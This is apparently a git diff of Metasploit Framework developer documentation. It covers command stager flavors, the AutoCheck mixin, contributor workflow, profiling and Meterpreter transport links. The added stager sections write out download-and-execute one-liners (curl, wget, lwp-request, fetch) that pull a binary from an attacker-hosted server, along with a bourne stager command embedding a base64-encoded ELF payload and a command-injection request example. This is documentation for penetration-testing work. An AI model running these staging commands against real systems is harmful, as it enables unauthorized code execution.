+* **What conditions the server must meet in order to be exploitable**: Quite often, a vulnerability requires multiple conditions to be exploitable. In some cases you can rely on the exploit's [[check command|How-to-write-a-check-method.md]], because when Metasploit flags something as vulnerable, it actually exploited the bug. For browser exploits using the BrowserExploitServer mixin, it will also check exploitable requirements before loading the exploit. But automation isn't always there, so you should try to find this information before running that "exploit" command. Sometimes it's just common sense, really. For example: a web application's file upload feature might be abused to upload a web-based backdoor, and stuff like that usually requires the upload folder to be accessible for the user. If your target doesn't meet the requirement(s), there is no point to try.

 You can use the info command to see the module's description:

@@ -1,6 +1,6 @@
 If you’ve found a way to execute a command on a target, and you’d like the leverage that ability to execute a command into a meterpreter session, command stagers are for you.  Command stagers provide an easy way to write exploits that leverage vulnerabilities such as [command execution](https://www.owasp.org/index.php/Command_Injection) or [code injection](https://www.owasp.org/index.php/Code_Injection) and turn them into sessions. There are currently 14 different flavors of command stagers, each uses system command (or commands) to save (or not save) your payload, sometimes decode, and execute.

-The hardest part about command stagers is understanding how much they do.  All you need to do for a command stager is to define how the command injection works in the `execute_command` method and then select a few options.
+The hardest part about command stagers is understanding how much they do and what they do.  All you need to do for a command stager is to define how the command injection works in the `execute_command` method and then select a few options.

 # The Vulnerability Test Case

@@ -70,7 +70,7 @@ include Msf::Exploit::CmdStager

 **2. Declare your flavors**

-To tell `Msf::Exploit::CmdStager` what flavors you want, you can add the ```CmdStagerFlavor``` info in the module's metadata. Either from the common level, or the target level. Multiple flavors are allowed.
+To tell `Msf::Exploit::CmdStager` what flavors you want, you can add the ```CmdStagerFlavor``` info in the module's metadata. Either from the common level, or the target level. Multiple flavors are allowed.  Remember that different flavors have different approaches to staging the payload for execution.  Some flavors will break the payload apart and embed the payload data into multiple `echo` or `printf` commands to write it to disk; others like `wget` and `curl` execute a command to retrieve the payload via network connection.  Your chosen flavor will be determined by the availability of a given command on the target system, the size of the command, the size of the payload, the ability to call out on the network, and the security posture of the target.

 An example of setting flavors for a specific target:

@@ -98,11 +98,32 @@ However, it is best to set the compatible list of flavors in `CmdStagerFlavor`,

 **3. Create the execute_command method**

-You also must create a ```def execute_command(cmd, opts = {})``` method in your module. This is how you define how to execute a command on the target.  The parameter `cmd` is the command to execute.  When writing the ```execute_cmd``` method, remember that
+You also must create a ```def execute_command(cmd, opts = {})``` method in your module. This is how you define how to execute a command on the target.  The parameter `cmd` is the command to execute.  When writing the ```execute_cmd``` method, remember that a great deal of work might already be done for you.  Here is an example of a web host that executes a command as part of a request:
+```ruby
+  def execute_command(cmd, _opts = {})
+    populate_values if @sid.nil? || @token.nil?
+    uri = datastore['URIPATH'] + '/vendor/htmlawed/htmlawed/htmLawedTest.php'
+
+    send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(uri),
+      'cookie' => 'sid=' + @sid,
+      'ctype' => 'application/x-www-form-urlencoded',
+      'encode_params' => true,
+      'vars_post' => {
+        'token' => @token,
+        'text' => cmd,
+        'hhook' => 'exec',
+        'sid' => @sid
+      }
+    })
+  end
+```
+Since the command is encapsulated within a request, it will be encoded for us.  When building and debugging an execute_command method that uses web requests, remember that `set httptrace true` will automatically display the http traffic as it is sent and received.

 **4. Decide on the supported payloads**

-CmdStagers are intended to support payloads that are uploaded, saved to disk, and launched, but many of the payloads in Metasploit Framework do not need to be saved to disk; these payloads are `ARCH_CMD` payloads that rely on software already present on the target system like netcat, bash, python, or ssh.  Depending on whether the payload needs to be saved to disk or not changes what payloads are supported and how we launch the payload, so we must provide the user the ability to pick between the two.
+CmdStagers are intended to support payloads that are uploaded, saved to disk, and launched, but many of the payloads in Metasploit Framework do not need to be saved to disk; these payloads are `ARCH_CMD` payloads that rely on software already present on the target system like `netcat`, `bash`, `python`, or `ssh`.  Depending on whether the payload needs to be saved to disk or not changes what payloads are supported and how we launch the payload, so we must provide the user the ability to pick between the two.
 The best way to let the user decide what kind of payload to use is by defining separate [[targets|Get-Started-Writing-an-Exploit.md]]

 Here is an example targets section from a command injection module:
@@ -133,10 +154,10 @@ Here is an example targets section from a command injection module:

 ```

-The first target is the `ARCH_CMD` target and `unix` platform.  This allows the user to select any payload that starts with `cmd/unix`.  These payloads do not need to be saved to disk and can just be launched at the command line.  The second is `ARCH_X64` and the platform is `linux`; this lets us choose any payload that starts with `linux/x64`.  These targets must be saved to disk before they can be launched, and as such, you will often see this second type of payload referred to as a ‘dropper’ because the file must be ‘dropped’ to the disk before it can be executed.  In each of the targets above, we’ve selected a default payload we know will work.
+The first target is the `ARCH_CMD` target and `unix` platform.  This allows the user to select any payload that starts with `cmd/unix`.  These payloads do not need to be saved to disk because they are "just" a command, rather than an executable file.  As such, they can be contained and launched within a command line string.  The second is `ARCH_X64` and the platform is `linux`; this lets us choose any payload that starts with `linux/x64` and includes binary elf payloads.  These payload types must be saved to disk before they can be launched, and as such, you will often see this second type of payload referred to as a ‘dropper’ because the file must be ‘dropped’ to the disk before it can be executed.  In each of the targets above, we’ve selected a default payload we know will work.  

 **4. Executing a payload**
-As we said earlier, the way a payload is executed depends on the payload type.  By including `Msf::Exploit::CmdStager` you are given access to a method called ```execute_cmdstager```.  ```execute_cmdstager``` makes a list of required commands to upload, save, and execute your payload, then uses the ```execute_command``` method you defined earlier to run them on the target.
+As we said earlier, the way a payload is executed depends on the payload type.  By including `Msf::Exploit::CmdStager` you are given access to a method called ```execute_cmdstager```.  ```execute_cmdstager``` makes a list of required commands to encode, upload, save, decode, and execute your payload, then uses the ```execute_command``` method you defined earlier to run each command on the target.
 Unfortunately, we just mentioned not all payloads need to be saved to disk.  In the case of a payload that does not need to be saved to disk, we only need to call ```execute_command```.
 This problem of payload/method juggling sounds far worse than it is.  Below is a quick example of how simple the ```exploit``` method will become if you have properly defined your targets as discussed in step 3:

@@ -152,8 +173,7 @@ This problem of payload/method juggling sounds far worse than it is.  Below is a
  end
 ```

-That’s it.  If the user selects an `ARCH_CMD` payload, we call the ```execute_command``` method on the _already_ _encoded_ payload.  You don’t need to worry about encoding the payload in your ```execute_command``` method.
-If the user has selected a binary payload like `ARCH_X64` or `ARCH_X86`, then we call ```execute_cmdstager``` which figures out how to save the file to disk and launch it based on the flavor you set earlier.
+That’s it.  If the user selects an `ARCH_CMD` payload, we call the ```execute_command``` method on the payload because as we said earlier, these payloads will execute within a single command.  If the user has selected a ```dropped``` payload like `ARCH_X64` or `ARCH_X86`, then we call ```execute_cmdstager``` which figures out the series of commands necessary to save the file to disk and launch it based on the flavor and max size you set earlier.

 Over the years, we have also learned that these options are quite handy when calling
 `execute_cmdstager`:
@@ -259,23 +279,26 @@ msf exploit(cmdstager_demo) > run
 # Flavors

 Now that we know how to use the `Msf::Exploit::CmdStager` mixin, let's take a look at the command
-stagers you can use.
+stagers you can use.  As mentioned above there are 2 general approaches to staging an executable on disk: by invoking a command that will download the executable file to disk like wget, curl, or fetch, or by breaking the executable file into pieces and including them commands themselves to write it to disk like echo, printf, or vbs. This delineation can be important, as trying to wite a stageless binary payload to disk using a stager that has to include the chunked payload in it will require the execution of dozens of commands, often each one having the signature of the exploit.  It is also useful to know the `printf` flavor is the only flavor that embeds the payload into the commands but does ***not*** use `echo`.

 Available flavors:

+Flavors requiring the payload to be broken apart and embedded into the commands:
 * [bourne](https://github.com/rapid7/rex-exploitation/blob/master/lib/rex/exploitation/cmdstager/bourne.rb)
+* [certutil](https://github.com/rapid7/rex-exploitation/blob/master/lib/rex/exploitation/cmdstager/certutil.rb)
 * [debug_asm](https://github.com/rapid7/rex-exploitation/blob/master/lib/rex/exploitation/cmdstager/debug_asm.rb)
 * [debug_write](https://github.com/rapid7/rex-exploitation/blob/master/lib/rex/exploitation/cmdstager/debug_write.rb)
 * [echo](https://github.com/rapid7/rex-exploitation/blob/master/lib/rex/exploitation/cmdstager/echo.rb)
 * [printf](https://github.com/rapid7/rex-exploitation/blob/master/lib/rex/exploitation/cmdstager/printf.rb)
 * [vbs](https://github.com/rapid7/rex-exploitation/blob/master/lib/rex/exploitation/cmdstager/vbs.rb)
-* [certutil](https://github.com/rapid7/rex-exploitation/blob/master/lib/rex/exploitation/cmdstager/certutil.rb)
-* [tftp](https://github.com/rapid7/rex-exploitation/blob/master/lib/rex/exploitation/cmdstager/tftp.rb)
-* [wget](https://github.com/rapid7/rex-exploitation/blob/master/lib/rex/exploitation/cmdstager/wget.rb)
+
+Flavors that rely on using a command to retrieve the payload via network connection
 * [curl](https://github.com/rapid7/rex-exploitation/blob/master/lib/rex/exploitation/cmdstager/curl.rb)
 * [fetch](https://github.com/rapid7/rex-exploitation/blob/master/lib/rex/exploitation/cmdstager/fetch.rb)
 * [lwprequest](https://github.com/rapid7/rex-exploitation/blob/master/lib/rex/exploitation/cmdstager/lwprequest.rb)
 * [psh_invokewebrequest](https://github.com/rapid7/rex-exploitation/blob/master/lib/rex/exploitation/cmdstager/psh_invokewebrequest.rb)
+* [tftp](https://github.com/rapid7/rex-exploitation/blob/master/lib/rex/exploitation/cmdstager/tftp.rb)
+* [wget](https://github.com/rapid7/rex-exploitation/blob/master/lib/rex/exploitation/cmdstager/wget.rb)


 ## VBS Command Stager - Windows Only
@@ -305,9 +328,7 @@ You will also need to make sure the module's supported platforms include windows

 ## Certutil Command Stager - Windows Only

-[Certutil](https://github.com/rapid7/rex-exploitation/blob/master/lib/rex/exploitation/cmdstager/certutil.rb) is a Windows command that can be used to dump and display certification authority, configuration information, configure certificate services, back and restore CA components, etc. It only comes with newer Windows systems starting from Windows 2012, and Windows 8.
-
-One thing certutil can also do for us is decode the Base64 string from a certificate, and save the decoded content to a file. The following demonstrates:
+[Certutil](https://github.com/rapid7/rex-exploitation/blob/master/lib/rex/exploitation/cmdstager/certutil.rb) is a Windows command that can be used to dump and display certification authority, configuration information, configure certificate services, back up and restore CA components, etc. It only comes with newer Windows systems starting from Windows 2012, and Windows 8.  I find the certutil flavor confusing, as certutil can be used to download files just like `wget` and `ftp`, we do not use it that way here; instead we use `echo` to write the file as a base64 encoded certificate, and then we use `certutil` to decode it prior to execution:

 ```bash
 echo -----BEGIN CERTIFICATE----- > encoded.txt
@@ -433,8 +454,17 @@ execute_cmdstager(flavor: :psh_invokewebrequest )

 **Linemax** minimum: 373

-The [Bourne](https://github.com/rapid7/rex-exploitation/blob/master/lib/rex/exploitation/cmdstager/bourne.rb) command stager supports multiple platforms except for Windows (because the use of the which command that Windows does not have). It functions rather similar to the VBS stager, except when it decodes the Base64 payload at runtime, there are multiple commands to choose from: base64, openssl, python, or perl.
-
+The [Bourne](https://github.com/rapid7/rex-exploitation/blob/master/lib/rex/exploitation/cmdstager/bourne.rb) command stager supports multiple platforms except for Windows. Just like many other stagers, it writes a base64 encoded payload to disk, but then it tries to decode it using four different commands: base64, openssl, python, and perl.  This is very useful if the target's OS is unpredictable. You can see the way it attempts to use multiple decoding techniques by setting `verbose` to `true` and launching an exploit that has `bourne` as a supported command stager flavor and selecting it as the flavor:
+```
+[*] Generated command stager: ["echo -n f0VMRgIBAQAAAAAAAAAAAAIAPgABAAAAeABAAAAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAEAAOAABAAAA
+AAAAAAEAAAAHAAAAAAAAAAAAAAAAAEAAAAAAAAAAQAAAAAAA+gAAAAAAAAB8AQAAAAAAAAAQAAAAAAAAMf9qCViZthBIidZNMclqIkFaagdaDwVIhcB4UWoK
+QVlQailYmWoCX2oBXg8FSIXAeDtIl0i5AgARXAoFh8lRSInmahBaaipYDwVZSIXAeSVJ/8l0GFdqI1hqAGoFSInnSDH2DwVZWV9IhcB5x2o8WGoBXw8FXmp+
+Wg8FSIXAeO3/5g==>>'/tmp/XtMnQ.b64' ; ((which base64 >&2 && base64 -d -) || (which base64 >&2 && base64 --decode -) || (w
+hich openssl >&2 && openssl enc -d -A -base64 -in /dev/stdin) || (which python >&2 && python -c 'import sys, base64; pri
+nt base64.standard_b64decode(sys.stdin.read());') || (which perl >&2 && perl -MMIME::Base64 -ne 'print decode_base64($_)
+')) 2> /dev/null > '/tmp/IPUov' < '/tmp/XtMnQ.b64' ; chmod +x '/tmp/IPUov' ; '/tmp/IPUov' ; rm -f '/tmp/IPUov' ; rm -f '
+/tmp/XtMnQ.b64'"]
+```
 To use the Bourne stager, either specify your CmdStagerFlavor in the metadata:

 ```ruby
@@ -454,7 +484,7 @@ execute_cmdstager(flavor: :bourne)

 The [echo](https://github.com/rapid7/rex-exploitation/blob/master/lib/rex/exploitation/cmdstager/echo.rb) command stager is suitable for multiple platforms except for Windows. It just [echos](http://manpages.ubuntu.com/manpages/trusty/man1/echo.1fun.html) the payload, chmod and execute it. An example of that looks similar to this:

-```
+```bash
 echo -en \\x41\\x41\\x41\\x41 >> /tmp/payload ; chmod 777 /tmp/payload ; /tmp/payload ; rm -f /tmp/payload
 ```

@@ -495,6 +525,11 @@ execute_cmdstager(flavor: :printf)

 ## cURL Command Stager - Multi Platform

+The [cURL](https://github.com/rapid7/rex-exploitation/blob/master/lib/rex/exploitation/cmdstager/curl.rb) command stager uses the `curl` command on the target host to download the payload file. It requires users to specify a `SRVHOST` and `SRVPORT` values and will start an HTTP server to host the payload file. An example of that looks similar to this:
+
+```bash
+curl -so /tmp/dtNGlaaL http://10.5.135.201:8080/mdkwKcdGCtU;chmod +x /tmp/dtNGlaaL;/tmp/dtNGlaaL;rm -f /tmp/dtNGlaaL"
+```
 To use the cURL stager, either specify your CmdStagerFlavor in the metadata:

 ```ruby
@@ -510,6 +545,12 @@ execute_cmdstager(flavor: :curl)

 ## wget Command Stager - Multi Platform

+The [wget](https://github.com/rapid7/rex-exploitation/blob/master/lib/rex/exploitation/cmdstager/wget.rb) command stager is similar to the curl command stager, except instead of using curl to download the file on the target host, it uses the `wget` command. It requires users to specify a `SRVHOST` and `SRVPORT` values and will start an HTTP server to host the payload file. An example of that looks similar to this:
+
+```bash
+wget -qO /tmp/MZXxujch http://10.5.135.201:8080/mdkwKcdGCtU;chmod +x /tmp/MZXxujch;/tmp/MZXxujch;rm -f /tmp/MZXxujch
+```
+
 To use the wget stager, either specify your CmdStagerFlavor in the metadata:

 ```ruby
@@ -525,6 +566,13 @@ execute_cmdstager(flavor: :wget)

 ## LWP Request Command Stager - Multi Platform

+The [lwp-request](https://github.com/rapid7/rex-exploitation/blob/master/lib/rex/exploitation/cmdstager/lwprequest.rb) command stager is similar to the curl command stager, except instead of using curl to download the file on the target host, it uses the `lwp-request` command. It requires users to specify a `SRVHOST` and `SRVPORT` values and will start an HTTP server to host the payload file. An example of that looks similar to this:
+
+```bash
+lwp-request -m GET http://10.5.135.201:8080/mdkwKcdGCtU > /tmp/OKOnDYwn;chmod +x /tmp/OKOnDYwn;/tmp/OKOnDYwn;rm -f /tmp/OKOnDYwn
+
+```
+
 To use the lwprequest stager, either specify your CmdStagerFlavor in the metadata:

 ```ruby
@@ -540,6 +588,11 @@ execute_cmdstager(flavor: :lwprequest)

 ## Fetch Command Stager - BSD Only

+The [fetch](https://github.com/rapid7/rex-exploitation/blob/master/lib/rex/exploitation/cmdstager/fetch.rb) command stager is similar to the curl command stager, except instead of using curl to download the file on the target host, it uses the `fetch` command. It requires users to specify a `SRVHOST` and `SRVPORT` values and will start an HTTP server to host the payload file. An example of that looks similar to this:
+
+```bash
+fetch -qo /tmp/UGWuPPcy http://10.5.135.201:8080/mdkwKcdGCtU;chmod +x /tmp/UGWuPPcy;/tmp/UGWuPPcy;rm -f /tmp/UGWuPPcy
+```
 To use the fetch stager, either specify your CmdStagerFlavor in the metadata:

 ```ruby
@@ -127,4 +127,28 @@ def check
 end
 ```

-Another possible way to inspect is grab the vulnerable file, and use Metasm. But of course, this is a lot slower and generates more network traffic.
+Another possible way to inspect is grab the vulnerable file, and use Metasm. But of course, this is a lot slower and generates more network traffic.
+
+
+## AutoCheck Mixin
+
+Metasploit offers the possibility to automatically call the `check` method before the `exploit` or `run` method is run. Just prepend the `AutoCheck` module for this, nothing more:
+
+```ruby
+  prepend Msf::Exploit::Remote::AutoCheck
+```
+
+According to the `CheckCode` returned by the `check` method, Framework will decided if the module should be executed or not:
+
+| Checkcode | Module executed? |
+| --------- | ----------- |
+| **Exploit::CheckCode::Vulnerable** | yes |
+| **Exploit::CheckCode::Appears** | yes |
+| **Exploit::CheckCode::Detected** | yes |
+| **Exploit::CheckCode::Safe** | no |
+| **Exploit::CheckCode::Unsupported** | no |
+| **Exploit::CheckCode::Unknown** | no |
+
+This mixin brings two new options that let the operator control its behavior:
+- `AutoCheck`: Sets whether or not the `check` method will be run. Default is `true`.
+- `ForceExploit`: Override the check result. The `check` method is run but the module will be executed regardless of the result. Default is `false`.
@@ -198,7 +198,7 @@ Filling in the blanks (provided by the original PR's information from GitHub) ge
 https://github.com/todb-r7/metasploit-framework/pull/new/schierlm:javapayload-maven...pr1217-fix-gitignore-conflict
 ````

-I opened that in a browser, and ended up with https://github.com/schierlm/metasploit-framework/pull/1 . Once @schierlm landed it on his branch (again, using `git merge --no-ff` and a short, informational merge commit message), all I (or anyone) had to do was `git fetch` to get the change reflected in upstream/pr/1217, and then the integration of the PR could continue.
+I opened that in a browser, and ended up with https://github.com/schierlm/metasploit-framework/pull/1 . Once [@schierlm](https://github.com/schierlm) landed it on his branch (again, using `git merge --no-ff` and a short, informational merge commit message), all I (or anyone) had to do was `git fetch` to get the change reflected in upstream/pr/1217, and then the integration of the PR could continue.

 # Collaboration between contributors

@@ -206,7 +206,7 @@ Note the important bit here: **you do not need commit rights to Rapid7 to branch

 # Landing to upstream

-Back to PR #1217. Turns out, my change was enough to land the original chunk of work. So, someone else (@jlee-r7) was able to to do something like this:
+Back to PR #1217. Turns out, my change was enough to land the original chunk of work. So, someone else ([@jlee-r7](https://github.com/jlee-r7)) was able to to do something like this:

 ````
 $ git fetch upstream
@@ -291,4 +291,4 @@ If that works, great, you know you don't have any merge conflicts right now.

 # Questions and Corrections

-Reach out in #contributors on [Metasploit Slack](https://metasploit.com/slack), or by e-mailing msfdev at metasploit dot com.
+Reach out in #contributors on [Metasploit Slack](https://metasploit.com/slack), or by e-mailing msfdev at metasploit dot com.
@@ -20,7 +20,7 @@ Tools like Veil, pwnlib, etc. have for a long time used native compilers and too

 ### Native first-class UUID-aware, async stager payload

-Make a new async payload type (based on pingback payload work) making secure comms, endpoint verification, and async communication first-class citizens, and on by default. These session types would support a much more limited set of actions than Meterpreter, only supporting sleep/upload/download/stage, but would be upgraded to Meterpreter directly as-needed (maybe even transparently). Network protocols can be much more exotic for this, and the listener/payload should be usable externally from Metasploit as well. Todo: pull in async payload proposal notes from @bwatters-r7.
+Make a new async payload type (based on pingback payload work) making secure comms, endpoint verification, and async communication first-class citizens, and on by default. These session types would support a much more limited set of actions than Meterpreter, only supporting sleep/upload/download/stage, but would be upgraded to Meterpreter directly as-needed (maybe even transparently). Network protocols can be much more exotic for this, and the listener/payload should be usable externally from Metasploit as well. Todo: pull in async payload proposal notes from [@bwatters-r7](https://github.com/bwatters-r7).

 ## Module Interface

@@ -0,0 +1,56 @@
+Metasploit has inbuilt tooling for measuring the performance of commands and generating CPU/memory reports after msfconsole or msfvenom is closed.
+
+### Measuring CPU/memory
+
+You can measure CPU/memory usage when starting msfconsole/msfvenom with environment variables:
+
+```
+METASPLOIT_CPU_PROFILE=true ./msfconsole -x 'exit'
+METASPLOIT_MEMORY_PROFILE=true ./msfconsole -x 'exit'
+```
+
+Granular CPU/memory performance can be recorded using Ruby blocks: 
+
+```ruby
+Metasploit::Framework::Profiler.record_cpu do
+  # ...
+end
+```
+
+```ruby
+Metasploit::Framework::Profiler.record_memory do
+  # ...
+end
+```
+
+In both scenarios, reports will be generated and written to disk that can be opened in a file editor/browser.
+
+### Measuring command performance
+
+The `time` command in msfconsole can be used to record the performance of a command:
+
+```msf
+msf6 exploit(windows/smb/ms17_010_psexec) > time reload
+[*] Reloading module...
+[+] Command "reload" completed in 0.20876399998087436 seconds
+```
+
+It is possible to record CPU and memory usage with the `--memory` and `--cpu` flags:
+
+```msf
+msf6 exploit(windows/smb/ms17_010_psexec) > time --cpu search smb
+... etc ...
+Generating CPU dump /var/folders/wp/fp12h8q13kq7mvf4mll72c140000gq/T/msf-profile-2023030711505620230307-77101-4josw1/cpu
+[+] Command "search smb" completed in 0.4150249999947846 seconds
+```
+
+Examples:
+
+```
+time
+time -h
+time --help
+time search smb
+time --memory search smb
+time --cpu search smb
+```
@@ -1,4 +1,4 @@
-The Loginpalooza contest is over! Congrats and thanks to @TomSellers, @ChrisTuncer, and @0a2940!
+The Loginpalooza contest is over! Congrats and thanks to [@TomSellers](https://github.com/TomSellers), [@ChrisTruncer](https://github.com/ChrisTruncer), and [@0a2940](https://github.com/0a2940)!

 The list of [modules to refactor](#modules-to-refactor) is still here. Modules that get refactored should be removed from the list entirely.

@@ -115,4 +115,4 @@ If you'd like to learn how to convert your favorite existing module, or write a
 - [ ]
  [post/windows/gather/enum_domains.rb](https://github.com/rapid7/metasploit-framework/tree/master/modules/post/windows/gather/enum_domains.rb) - Creates realms
 - [ ]
-  [post/windows/gather/enum_logged_on_users.rb](https://github.com/rapid7/metasploit-framework/tree/master/modules/post/windows/gather/enum_logged_on_users.rb) - Creates publics but not privates
+  [post/windows/gather/enum_logged_on_users.rb](https://github.com/rapid7/metasploit-framework/tree/master/modules/post/windows/gather/enum_logged_on_users.rb) - Creates publics but not privates
@@ -12,7 +12,7 @@ The Meterpreter that we have known and loved for years has always had the abilit

 Recent modifications to Meterpreter have changed this. Meterpreter has a new [[configuration system|Meterpreter-Configuration]] that supports multiple transports and it now supports the addition of new transports while the session is still running. With the extra transports configured, Meterpreter allows the user to cycle through those transports without shutting down the session.

-Not only that, but Meterpreter will cycle through these transports automatically when communication fails. For more information on the session resiliency features, please view the [Meterpreter Reliable Network Communication][].
+Not only that, but Meterpreter will cycle through these transports automatically when communication fails. For more information on the session resiliency features, please view the [[Meterpreter Reliable Network Communication|[[reliable network communication documentation|./Meterpreter-Reliable-Network-Communication.md]].

 This document describes how multiple transports are added to an existing Meterpreter session.

@@ -78,7 +78,7 @@ The first part of the output is the session expiry time. To learn more about exp

 The above output shows that we have one transport enabled that is using `TCP`. We can infer that the transport was a `reverse_tcp` (rather than `bind_tcp`) due to the fact that there is a host IP address in the transport URL. If it was a `bind_tcp`, this would be blank.

-`Comms T/O` refers to the communications timeout value. `Retry Total` is the total time to attempt reconnects on this transport, and `Retry Wait` indicates how often a retry of the current transport should happen. Each of these is documented in depth in the [Timeout documentation][].
+`Comms T/O` refers to the communications timeout value. `Retry Total` is the total time to attempt reconnects on this transport, and `Retry Wait` indicates how often a retry of the current transport should happen. Each of these is documented in depth in the [[Timeout documentation|./meterpreter-timeout-control.md]].

 The verbose version of this command shows more detail about the transport, but only in cases where extra detail is available (such as `reverse_http/s`). The following command shows the output of the `list` sub-command with the verbose flag (`-v`) after an `HTTP` transport has been added:

@@ -362,6 +362,3 @@ The following Meterpreter implementations currently support the transport comman
 * Android
 * Java
 * Python
-
-  [Timeout documentation]: https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-timeout-control.html
-  [Reliable Network documentation]: https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-reliable-network-communication.html
@@ -20,7 +20,7 @@ Linux packages are built nightly for .deb (i386, amd64, armhf, arm64) and .rpm (

 ### macOS manual installation

-The latest OS X installer package can also be downloaded directly here: <https://osx.metasploit.com/metasploitframework-latest.pkg>, with the last 10 builds archived at <https://osx.metasploit.com/>. Simply download and launch the installer to install Metaploit Framework with all of its dependencies.
+The latest OS X installer package can also be downloaded directly here: <https://osx.metasploit.com/metasploitframework-latest.pkg>, with the last 8 builds archived at <https://osx.metasploit.com/>. Simply download and launch the installer to install Metasploit Framework with all of its dependencies.

 ## Installing Metasploit on Windows

@@ -232,7 +232,7 @@ The full list of available functions is as follows:
 #### meterpreter.transport

 * `meterpreter.transport.list()` - list all transports in the target.
-* `meterpreter.transport.add(url, session_expiry, comm_timeout, retry_total, retry_wait, ua, proxy_host, proxy_user, proxy_pass, cert_hash)` - allows for transports to be added to the Meterpreter session. All but the `url` parameter come with a sane default. Full details of each of these parameters can be found in the [transport][] documentation.
+* `meterpreter.transport.add(url, session_expiry, comm_timeout, retry_total, retry_wait, ua, proxy_host, proxy_user, proxy_pass, cert_hash)` - allows for transports to be added to the Meterpreter session. All but the `url` parameter come with a sane default. Full details of each of these parameters can be found in the [[transport|meterpreter-transport-control]] documentation.

 It is not possible to delete transports using the python extension as this opens the door to many kinds of failure.

@@ -331,7 +331,6 @@ Hell no! But the goal is to get closer and closer to perfect as we go. It's up t

 Please do, making good use of the Github issues feature. Better still, create a PR for one!

-  [transport]: https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-transport-control.html
  [inveigh]: https://github.com/Kevin-Robertson/Inveigh

 ## Currently Loadable Native Libraries
@@ -1,4 +1,4 @@
-SQL Injection library support was added in 2020 by @red0xff during the Google Summer of Code.
+SQL Injection library support was added in 2020 by [@red0xff](https://github.com/red0xff)  during the Google Summer of Code.

 ## Supported Databases

@@ -6,7 +6,7 @@ The Windows API comes with two ways to talk via HTTP/S, they are [WinInet][] and

 The [WinInet][] API was designed for use in desktop applications. It provides all the features required by applications to use HTTP/S while delegating much of the responsibilty of handling implementation detail to the underlying API and OS. This API can result in some user interface elements appearing if not handled correctly.

-[WinInet][] comes with some limitations, one of which is that it's close to impossible to do any kind of custom validation, parsing, or handling of SSL communications. One of the needs of Metasploit users is to be able to enable a [Paranoid Mode][] that forces Meterpreter to only talk with the appropriate endpoint. The goal is to prevent shells from being hijacked by unauthorised users. In order to do this, one of the things that was implemented was the verification of the SHA1 hash of the SSL certificate that Meterpreter reads from the server. If this hash doesn't match the one that Meterpreter is configured with, Meterpreter will shut down. [WinInet][] doesn't make this process possible without a _lot_ of custom work.
+[WinInet][] comes with some limitations, one of which is that it's close to impossible to do any kind of custom validation, parsing, or handling of SSL communications. One of the needs of Metasploit users is to be able to enable a [[Paranoid Mode|./meterpreter-paranoid-mode.md]] that forces Meterpreter to only talk with the appropriate endpoint. The goal is to prevent shells from being hijacked by unauthorised users. In order to do this, one of the things that was implemented was the verification of the SHA1 hash of the SSL certificate that Meterpreter reads from the server. If this hash doesn't match the one that Meterpreter is configured with, Meterpreter will shut down. [WinInet][] doesn't make this process possible without a _lot_ of custom work.

 For applications such as this, [WinHTTP][] is the "preferred" option as deemed by Microsoft. This API is designed to work under a service, and provides a greater number of ways to interact with communications made over HTTP/S. With this API it was trivial to implement the SHA1 hash verification and force Meterpreter to shut down when a MITM is detected.

@@ -61,5 +61,4 @@ HTTP/S communications in Windows is a hairy beast, and trying to cater for all c
  [WinInet]: https://msdn.microsoft.com/en-us/library/windows/desktop/aa383630%28v=vs.85%29.aspx
  [WinHTTP]: https://msdn.microsoft.com/en-us/library/windows/desktop/aa382925%28v=vs.85%29.aspx
  [winhttp_wininet]: https://msdn.microsoft.com/en-us/library/windows/desktop/hh227298%28v=vs.85%29.aspx
-  [Paranoid Mode]: https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-paranoid-mode.html
-  [OJ]: https://github.com/OJ
+  [OJ]: https://github.com/OJ
@@ -169,6 +169,99 @@ if __name__ == '__main__':
 ```
 The example sends a get request to the given `rhost` and `targeturi`, then calls `logging.info()` on the result to have the output displayed in msfconsole.

+### Debugging Python modules
+
+If you want to run an external module as a standalone program from your metasploit-framework folder just specify the Python path to include
+the Metasploit library support and run the module directly:
+
+```
+$ PYTHONPATH=./lib/msf/core/modules/external/python:$PYTHONPATH python3 ./modules/auxiliary/scanner/wproxy/att_open_proxy.py
+```
+
+The Python module will wait for stdin to receive JSON-RPC input. Entering the request to run the module:
+
+```jsonl
+{ "jsonrpc": "2.0", "id": "1337", "method": "run", "params": { "rhosts": ["127.0.0.1"], "rport": "49152" } }
+```
+
+You will see the JSON-RPC responses printed to stdout:
+
+```jsonl
+{"jsonrpc": "2.0", "method": "message", "params": {"level": "debug", "message": "127.0.0.1:49152 - Connected"}}
+{"jsonrpc": "2.0", "method": "message", "params": {"level": "debug", "message": "127.0.0.1:49152 - Received 5 bytes"}}
+{"jsonrpc": "2.0", "method": "message", "params": {"level": "info", "message": "127.0.0.1:49152 - Does not match"}}
+{"jsonrpc": "2.0", "method": "message", "params": {"level": "debug", "message": "127.0.0.1:49152 - Does not match with: bytearray(b'xxxxx')"}}
+```
+
+You can pipe the JSON-RPC request as well for automation purposes:
+
+```
+echo '{ "jsonrpc": "2.0", "id": "1337", "method": "run", "params": { "rhosts": ["127.0.0.1"], "rport": "49152" } }' | PYTHONPATH=./lib/msf/core/modules/external/python:$PYTHONPATH python3 ./modules/auxiliary/scanner/wproxy/att_open_proxy.py
+```
+
+The Python external modules can be run directly with command line options:
+
+```
+$ PYTHONPATH=./lib/msf/core/modules/external/python:$PYTHONPATH python3.9 ./modules/auxiliary/scanner/wproxy/att_open_proxy.py --help
+usage: att_open_proxy.py [-h] --rhosts RHOSTS [--rport RPORT] [ACTION]
+
+The Arris NVG589 and NVG599 routers configured with AT&T U-verse firmware 9.2.2h0d83 expose an un-authenticated proxy that allows connecting from WAN to LAN by MAC address.
+
+positional arguments:
+  ACTION           The action to take (['run'])
+
+optional arguments:
+  -h, --help       show this help message and exit
+  --rport RPORT    The target port, (default: 49152)
+
+required arguments:
+  --rhosts RHOSTS  The target address
+```
+
+For example:
+
+```
+PYTHONPATH=./lib/msf/core/modules/external/python:$PYTHONPATH python3 ./modules/auxiliary/scanner/wproxy/att_open_proxy.py --rhosts 127.0.0.1 --rport 49152
+```
+
